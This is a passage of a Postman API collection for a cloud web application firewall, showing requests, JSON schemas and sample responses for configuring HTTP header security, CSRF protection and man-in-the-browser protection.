GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"69"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"6d9f2d89-7b71-11e9-918b-d1f25cae1878"},{"key":"Access-Control-Allow-Origin","value":"https://www.fortiweb-cloud.com"},{"key":"x-amz-apigw-id","value":"aAyj4Ej5IAMF_OQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce3647f-8c3095f78ffc04b0a1ac1bc0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'argument-type': \\\"Error enum type, only allow ['data-type', 'regular-expression']\\\"}\"\n}"}],"_postman_id":"7814128f-e557-4f36-9f65-8a3acb30524c"},{"name":"Get HTTP Header Security","id":"a6602bd1-dd6a-4a94-900a-5df7ea89ac24","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/httpheadersecurity","description":"<p>Get the information of HTTP header security.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","httpheadersecurity"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"46a004d5-2ae4-4c69-8400-3eaaea788523","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/httpheadersecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","httpheadersecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}2"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:18:44 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"667dec40-933c-11e9-a316-f7392f703110"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"bklaGHfToAMFhew="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"b380089d-f163-4834-b0d6-549b16f3bb26","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/httpheadersecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","httpheadersecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:17:54 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"154"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"48774eb3-933c-11e9-b959-fd07e0b7249d"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bklSOHxfoAMFhZA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b4f41-c62f5be0dfc8520082169b20;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"x-frame-options\": \"enable\",\n        \"x-content-type-options\": \"enable\",\n        \"x-xss-protection\": \"enable\",\n        \"content-security-policy\": \"enable\",\n        \"custom-value\": \"test\"\n    }\n}"}],"_postman_id":"a6602bd1-dd6a-4a94-900a-5df7ea89ac24"},{"name":"Update HTTP Header Security","id":"59395cdf-8917-49aa-9530-0abe255874f2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"x-frame-options\": \"enable\",\n    \"x-content-type-options\": \"enable\",\n    \"content-security-policy\": \"enable\",\n    \"custom-value\": \"test\"\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/httpheadersecurity","description":"<p>Update the information about HTTP header security.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable HTTP header security\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"x-frame-options\": {\n            \"description\": \"Configure to prevent browsers from Clickjacking attacks by providing appropriate restrictions on displaying pages in frames\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"x-xss-protection\": {\n            \"description\": \"Configure to enable a browser's built-in Cross-site scripting (XSS) protection\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"x-content-type-options\": {\n            \"description\": \"Configure to prevent browsers from MIME content-sniffing attacks by disabling the browser's MIME sniffing function\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        }\n    }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","httpheadersecurity"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"503be7a5-2ae5-4f9a-b42e-7a474c312aca","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"x-frame-options\": \"enable\",\n    \"x-content-type-options\": \"enable\",\n    \"content-security-policy\": \"enable\",\n    \"custom-value\": \"test\"\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/httpheadersecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","httpheadersecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:24:03 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"25062b03-933d-11e9-bb9f-65db596aa7ee"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkmMCH6HoAMFhpg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b50b3-9e1ebda70eb8199e18d1046a;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"bf66f8ab-360f-4b11-b5d9-c03420e7a7bb","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"_status\": \"enable\",\r\n    \"x-frame-options\": \"enable\",\r\n    \"x-content-type-options\": \"enable\",\r\n    \"content-security-policy\": \"enable\",\r\n    \"custom-value\": \"\"\r\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/httpheadersecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","httpheadersecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:29:11 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"77"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"dc359dd9-933d-11e9-a10b-a932dd354fea"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkm8EFRQoAMFQDg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b51e6-f38873d08959c4f81aec7fef;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Empty values are not allowed.\"\n}"}],"_postman_id":"59395cdf-8917-49aa-9530-0abe255874f2"},{"name":"Get CSRF Protection","id":"fd2c4dd8-6ad9-451a-a55e-798dbc7cbf15","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/csrfprotection","description":"<p>Get the information of CSRF protection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","csrfprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"89beac7e-4782-40d1-bc60-a632260cf12f","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/csrfprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","csrfprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:34:01 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"89a7032b-933e-11e9-a078-15992e3ca3f6"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"bknpiEYLoAMFsDQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"bd4424b5-9697-4f3d-b3fe-8ebb36c92a69","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/csrfprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","csrfprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:33:00 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"146"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"650d0caa-933e-11e9-92c1-f7c218f722c6"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bknf8GDPIAMFwMA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b52cc-fbcb19d8ac40052499269aa1;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"action\": \"alert_deny\",\n        \"csrfprotection\": {\n            \"csrf-page-list\": [],\n            \"csrf-url-list\": []\n        }\n    }\n}"}],"_postman_id":"fd2c4dd8-6ad9-451a-a55e-798dbc7cbf15"},{"name":"Update CSRF Protection","id":"808ee563-e150-489e-9c4a-1128c33654e2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"action\": \"alert_deny\",\n    \"csrfprotection\": {\n        \"csrf-page-list\": [\n            {\n                \"request-url\": \"/abc\",\n                \"parameter-filter\": \"enable\",\n                \"parameter-name\": \"pa1\",\n                \"parameter-value\": \"123\"\n            }\n        ],\n        \"csrf-url-list\": [\n            {\n                \"request-url\": \"/bcd\",\n                \"parameter-filter\": \"enable\",\n                \"parameter-name\": \"pa1\",\n                \"parameter-value\": \"123\"\n            }\n        ]\n    }\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/csrfprotection","description":"<p>Update the information about the CSRF Protection.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable CSRF protection\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"action\": {\n            \"description\": \"The action when it detects a missing or incorrect anti-CSRF parameter\",\n            \"type\": \"string\",\n            \"enum\": [\"alert\",\"alert_deny\",\"deny_no_log\"],\n            \"default\": \"alert\"\n        },\n        \"csrfprotection\": {\n            \"type\": \"object\",\n            \"properties\": {\n                \"csrf-page-list\": {\n                    \"type\": \"object\",\n                    \"properties\": {\n                        \"members\": {\n                            \"type\": \"array\",\n                            \"maxItems\": 256,\n                            \"items\": {\n                                \"type\": \"object\",\n                                \"required\": [\"request-url\"],\n                                \"properties\": {\n                                    \"request-url\": {\n                                        \"type\": \"string\"\n                                    },\n                                    \"parameter-filter\": {\n                                        \"description\": \"Configure to specify a parameter name and value to match\",\n                                        \"type\": \"string\",\n                                        \"enum\": [\n                                            \"enable\",\n                                            \"disable\"\n                                        ],\n                                        \"default\": \"disable\"\n                                    },\n                                    \"parameter-name\": {\n                                        \"description\": \"The parameter to match\",\n                                        \"type\": \"string\"\n                                    },\n                                    \"parameter-value\": {\n                                        \"description\": \"The value for the parameter\",\n                                        \"type\": \"string\"\n                                    }\n                                }\n                            }\n\n                        }\n                    }\n                },\n                \"csrf-url-list\": {\n                    \"type\": \"object\",\n                    \"properties\": {\n                        \"members\": {\n                            \"type\": \"array\",\n                            \"maxItems\": 256,\n                            \"items\": {\n                                \"type\": \"object\",\n                                \"required\": [\"request-url\"],\n                                \"properties\": {\n                                    \"request-url\": {\n                                        \"type\": \"string\"\n                                    },\n                                    \"parameter-filter\": {\n                                        \"description\": \"Configure to specify a parameter name and value to match\",\n                                        \"type\": \"string\",\n                                        \"enum\": [\n                                            \"enable\",\n                                            \"disable\"\n                                        ],\n                                        \"default\": \"disable\"\n                                    },\n                                    \"parameter-name\": {\n                                        \"description\": \"The parameter to match\",\n                                        \"type\": \"string\"\n                                    },\n                                    \"parameter-value\": {\n                                        \"description\": \"The value for the parameter\",\n                                        \"type\": \"string\"\n                                    }\n                                }\n                            }\n\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","csrfprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"34eee248-d83c-492c-a631-0ed91558a97d","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"action\": \"alert_deny\",\n    \"csrfprotection\": {\n        \"csrf-page-list\": [\n            {\n                \"request-url\": \"/abc\",\n                \"parameter-filter\": \"enable\",\n                \"parameter-name\": \"pa1\",\n                \"parameter-value\": \"123\"\n            }\n        ],\n        \"csrf-url-list\": [\n            {\n                \"request-url\": \"/bcd\",\n                \"parameter-filter\": \"enable\",\n                \"parameter-name\": \"pa1\",\n                \"parameter-value\": \"123\"\n            }\n        ]\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/csrfprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","csrfprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:37:21 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"0089e3c7-933f-11e9-9470-23cb75ea8747"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkoIsEHioAMFnnw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b53d1-541fb9d0b9970ff077b61470;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"8145c51d-d952-44d4-909f-a26714b041d4","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"action\": \"alert_deny\",\n    \"csrfprotection\": {\n        \"csrf-page-list\": [\n            {\n                \"request-url\": \"abc\",\n                \"parameter-filter\": \"enable\",\n                \"parameter-name\": \"pa1\",\n                \"parameter-value\": \"123\"\n            }\n        ],\n        \"csrf-url-list\": [\n            {\n                \"request-url\": \"bcd\",\n                \"parameter-filter\": \"enable\",\n                \"parameter-name\": \"pa1\",\n                \"parameter-value\": \"123\"\n            }\n        ]\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/csrfprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","csrfprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:38:02 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"42"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"18b8aef3-933f-11e9-bece-754b239414fa"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkoPCGenoAMF0dQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b53f9-eae1bc3c29ac5657b4f313ca;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"The URL must start with '/'.\"\n}"}],"_postman_id":"808ee563-e150-489e-9c4a-1128c33654e2"},{"name":"Get MITB Protection","id":"54ca0709-8fb2-47e5-a1c6-636ab9822391","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/mitbprotection","description":"<p>Get the information of MiTB protection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","mitbprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"4217a0b8-856b-492f-b291-a033827958aa","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/mitbprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","mitbprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:39:50 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"223"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"59581bfa-933f-11e9-8cdd-5588415f6d89"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkof-FpzoAMFv5w="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b5466-70777372cf2d1c0eaf05f002;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"action\": \"alert\",\n        \"mitbprotection\": {\n            \"protected-parameter-list\": [],\n            \"name\": \"cloud_test\",\n            \"allowed-external-domains-list\": [],\n            \"request-url\": \"/url.html\",\n            \"post-url\": \"/url.html\"\n        }\n    }\n}"},{"id":"fdc03c0a-1be3-414a-925b-4a414c530549","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/mitbprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","mitbprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:40:13 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"6768b993-933f-11e9-a6f6-395026ffcf52"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"bkojqGtUoAMFp_g="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"54ca0709-8fb2-47e5-a1c6-636ab9822391"},{"name":"Update MITB Protection","id":"3b5ebacd-48ca-44ce-9023-0304174033a1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"action\": \"alert\",\n    \"mitbprotection\": {\n        \"protected-parameter-list\": [\n            {\n                \"type\": \"password-input\",\n                \"name\": \"p1\",\n                \"obfuscate\": \"enable\",\n                \"encrypt\": \"enable\"\n            }\n        ],\n        \"name\": \"cloud_test\",\n        \"allowed-external-domains-list\": [\n            {\n                \"domain\": \"www.abc.com\"\n            }\n        ],\n        \"request-url\": \"/url.html\",\n        \"post-url\": \"/url.html\"\n    }\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/mitbprotection","description":"<p>Update the information about MITB Protection.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable MITB protection\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"action\": {\n            \"description\": \"The action when it detects a missing or incorrect anti-CSRF parameter\",\n            \"type\": \"string\",\n            \"enum\": [\"alert\",\"alert_deny\"],\n            \"default\": \"alert\"\n        },\n        \"mitbprotection\": {\n            \"type\": \"object\",\n            \"properties\": {\n                \"request-url\": {\n                    \"description\": \"The literal URL which hosts the web page containing the user input fields you want to protect\",\n                    \"type\": \"string\"\n                },\n                \"post-url\": {\n                    \"description\": \"The post URL such as '*'\",\n                    \"type\": \"string\"\n                },\n                \"protected-parameter-list\": {\n                    \"type\": \"object\",\n                    \"properties\": {\n                        \"members\": {\n                            \"type\": \"array\",\n                            \"maxItems\": 256,\n                            \"items\": {\n                                \"type\": \"object\",\n                                \"required\": [\"name\", \"type\"],\n                                \"properties\": {\n                                    \"name\": {\n                                        \"description\": \"The name of the user input field, which shall be exactly the same with the name of user input field in the source code of the web page\"},\n                                    \"type\": {\n                                        \"description\": \"Select either regular-input or password-input\",\n                                        \"type\": \"string\",\n                                        \"enum\": [\n                                            \"regular-input\",\n                                            \"password-input\"\n                                        ],\n                                        \"default\": \"regular-input\"\n                                    },\n                                    \"obfuscate\": {\n                                        \"description\": \"Available when the Type is regular-input or password-input\",\n                                        \"type\": \"string\",\n                                        \"enum\": [\n                                            \"enable\",\n                                            \"disable\"\n                                        ],\n                                        \"default\": \"disable\"\n                                    },\n                                    \"encrypt\": {\n                                        \"description\": \"Available when the Type is password-input\",\n                                        \"type\": \"string\",\n                                        \"enum\": [\n                                            \"enable\",\n                                            \"disable\"\n                                        ],\n                                        \"default\": \"disable\"\n                                    },\n                                    \"anti-keyLogger\": {\n                                       \"description\": \"Available when the Type is password-input\",\n                                        \"type\": \"string\",\n                                        \"enum\": [\n                                            \"enable\",\n                                            \"disable\"\n                                        ],\n                                        \"default\": \"disable\"\n                                    }\n                                }\n                            }\n\n                        }\n                    }\n                },\n                \"allowed-external-domains-list\": {\n                    \"type\": \"object\",\n                    \"properties\": {\n                        \"members\": {\n                            \"type\": \"array\",\n                            \"maxItems\": 256,\n                            \"items\": {\n                                \"type\": \"object\",\n                                \"required\": [\"domain\"],\n                                \"properties\": {\n                                    \"domain\": {\n                                        \"type\": \"string\"\n                                    }\n                                }\n                            }\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","mitbprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"234f3205-e181-4579-b97d-554f08f1107d","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"action\": \"alert\",\n    \"mitbprotection\": {\n        \"protected-parameter-list\": [\n            {\n                \"type\": \"password-input\",\n                \"name\": \"p1\",\n                \"obfuscate\": \"enable\",\n                \"encrypt\": \"enable\"\n            }\n        ],\n        \"name\": \"cloud_test\",\n        \"allowed-external-domains-list\": [\n            {\n                \"domain\": \"/abc\"\n            }\n        ],\n        \"request-url\": \"/url.html\",\n        \"post-url\": \"/url.html\"\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/mitbprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","mitbprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:41:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"9f1532f4-933f-11e9-97ac-a96c66690638"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkoyQHWvoAMFZ3g="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b54db-f1c8079a7db1f92ad4d863c0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"3945e897-813f-4673-a0b0-649feef335f6","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"},{"key":"authorization","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"action\": \"alert\",\n    \"mitbprotection\": {\n        \"protected-parameter-list\": [\n            {\n                \"type\": \"password-input\",\n                \"obfuscate\": \"enable\",\n                \"encrypt\": \"enable\"\n            }\n        ],\n        \"name\": \"cloud_test\",\n        \"allowed-external-domains-list\": [\n            {\n                \"domain\": \"www.abc.com\"\n            }\n        ],\n        \"request-url\": \"/url.html\",\n        \"post-url\": \"/url.html\"\n    